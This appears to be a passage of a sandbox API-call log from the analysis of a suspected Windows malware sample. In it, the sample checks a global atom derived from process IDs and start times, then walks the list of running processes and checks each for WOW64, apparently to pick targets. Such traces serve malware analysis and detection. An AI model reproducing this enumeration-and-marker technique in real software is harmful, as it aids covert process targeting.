	[0073.179] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.179] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.179] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] GetLastError () returned 0x5
	[0073.179] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.180] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetLastError () returned 0x5
	[0073.181] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.181] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.181] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.181] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.181] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.181] CloseHandle (hObject=0x224) returned 1
	[0073.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.182] CloseHandle (hObject=0x224) returned 1
	[0073.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.182] CloseHandle (hObject=0x224) returned 1
	[0073.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.358] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.362] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.362] CloseHandle (hObject=0x224) returned 1
	[0073.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.363] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.363] CloseHandle (hObject=0x224) returned 1
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.363] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.363] CloseHandle (hObject=0x224) returned 1
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.363] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.363] CloseHandle (hObject=0x224) returned 1
	[0073.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.364] CloseHandle (hObject=0x224) returned 1
	[0073.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.364] CloseHandle (hObject=0x224) returned 1
	[0073.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.364] CloseHandle (hObject=0x224) returned 1
	[0073.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.364] CloseHandle (hObject=0x224) returned 1
	[0073.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.365] CloseHandle (hObject=0x224) returned 1
	[0073.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.365] CloseHandle (hObject=0x224) returned 1
	[0073.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.365] CloseHandle (hObject=0x224) returned 1
	[0073.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.365] CloseHandle (hObject=0x224) returned 1
	[0073.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.365] CloseHandle (hObject=0x224) returned 1
	[0073.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.366] CloseHandle (hObject=0x224) returned 1
	[0073.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.366] CloseHandle (hObject=0x224) returned 1
	[0073.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e810, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.366] CloseHandle (hObject=0x224) returned 1
	[0073.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.366] CloseHandle (hObject=0x224) returned 1
	[0073.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.366] CloseHandle (hObject=0x224) returned 1
	[0073.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.367] CloseHandle (hObject=0x224) returned 1
	[0073.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
